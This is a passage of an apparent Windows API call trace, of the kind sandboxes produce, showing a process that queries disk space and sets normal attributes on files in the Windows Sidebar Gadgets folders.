SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0133.440] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0133.441] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0133.441] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0133.441] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0133.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0133.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0133.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0133.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0133.444] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png", dwFileAttributes=0x80) returned 0 [0133.444] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0133.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0133.445] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0133.446] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0133.446] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0133.446] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0133.446] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0133.447] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0133.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0133.447] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0133.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0133.447] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0133.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0133.448] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0133.448] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0133.448] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0133.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0133.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0133.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0133.450] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0133.450] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0133.450] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0133.451] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0133.452] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0133.453] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0133.453] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0133.453] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0133.455] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0133.455] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0133.455] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0133.455] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0133.456] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png", dwFileAttributes=0x80) returned 0 [0133.456] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0133.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0133.457] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0133.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0133.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0133.458] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0133.458] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0133.458] CoTaskMemFree (pv=0x4e1c10) [0133.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0133.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0133.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0133.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0133.460] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0133.460] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.466] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\flyout.html", dwFileAttributes=0x80) returned 0 [0133.469] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.474] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\gadget.xml", dwFileAttributes=0x80) returned 0 [0133.475] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.480] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\RSSFeeds.html", dwFileAttributes=0x80) returned 0 [0133.482] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.489] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\settings.html", dwFileAttributes=0x80) returned 0 [0133.490] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0133.490] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0133.490] CoTaskMemFree (pv=0x4e1c10) [0133.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0133.491] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0133.491] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0133.491] CoTaskMemFree (pv=0x4e1c10) [0133.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0133.492] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0133.492] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0133.492] CoTaskMemFree (pv=0x4e1c10) [0133.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0133.499] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.503] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png", dwFileAttributes=0x80) returned 0 [0133.504] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.509] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png", dwFileAttributes=0x80) returned 0 [0133.510] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.514] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png", dwFileAttributes=0x80) returned 0 [0133.516] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.520] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png", dwFileAttributes=0x80) returned 0 [0133.521] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.526] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png", dwFileAttributes=0x80) returned 0 [0133.528] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.533] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png", dwFileAttributes=0x80) returned 0 [0133.534] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.539] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_floating.png", dwFileAttributes=0x80) returned 0 [0133.541] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.545] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_flyout.png", dwFileAttributes=0x80) returned 0 [0133.547] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.560] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\navBack.png", dwFileAttributes=0x80) returned 0 [0133.562] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.567] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rssBackBlue_docked.png", dwFileAttributes=0x80) returned 0 [0133.568] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.573] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rssBackBlue_Undocked.png", dwFileAttributes=0x80) returned 0 [0133.574] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.579] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_docked.png", dwFileAttributes=0x80) returned 0 [0133.581] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.585] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_floating.png", dwFileAttributes=0x80) returned 0 [0133.587] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.592] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_flyout.png", dwFileAttributes=0x80) returned 0 [0133.593] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0133.593] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0133.593] CoTaskMemFree (pv=0x4e1c10) [0133.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0133.594] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0133.603] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png", dwFileAttributes=0x80) returned 0 [0133.604] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0133.609] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png", dwFileAttributes=0x80) returned 0 [0133.611] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0133.616] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png", dwFileAttributes=0x80) returned 0 [0133.617] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0133.617] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0133.617] CoTaskMemFree (pv=0x4e1c10) [0133.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0133.618] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.624] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\gadget.xml", dwFileAttributes=0x80) returned 0 [0133.625] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.630] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\settings.html", dwFileAttributes=0x80) returned 0 [0133.632] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.637] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\slideShow.html", dwFileAttributes=0x80) returned 0 [0133.638] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0133.638] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0133.638] CoTaskMemFree (pv=0x4e1c10) [0133.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0133.639] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0133.639] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0133.639] CoTaskMemFree (pv=0x4e1c10) [0133.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0133.639] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0133.639] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0133.640] CoTaskMemFree (pv=0x4e1c10) [0133.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0133.648] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.653] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png", dwFileAttributes=0x80) returned 0 [0133.654] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.659] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_down.png", dwFileAttributes=0x80) returned 0 [0133.660] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.665] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_hov.png", dwFileAttributes=0x80) returned 0 [0133.667] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.671] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_rest.png", dwFileAttributes=0x80) returned 0 [0133.673] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.678] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_down.png", dwFileAttributes=0x80) returned 0 [0133.679] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.685] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_hov.png", dwFileAttributes=0x80) returned 0 [0133.686] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.691] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_rest.png", dwFileAttributes=0x80) returned 0 [0133.692] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.698] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_down.png", dwFileAttributes=0x80) returned 0 [0133.699] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.704] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_hov.png", dwFileAttributes=0x80) returned 0 [0133.706] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.723] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_rest.png", dwFileAttributes=0x80) returned 0 [0133.725] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.730] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_down.png", dwFileAttributes=0x80) returned 0 [0133.731] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.736] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_hov.png", dwFileAttributes=0x80) returned 0 [0133.737] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.742] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_rest.png", dwFileAttributes=0x80) returned 0 [0133.743] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", 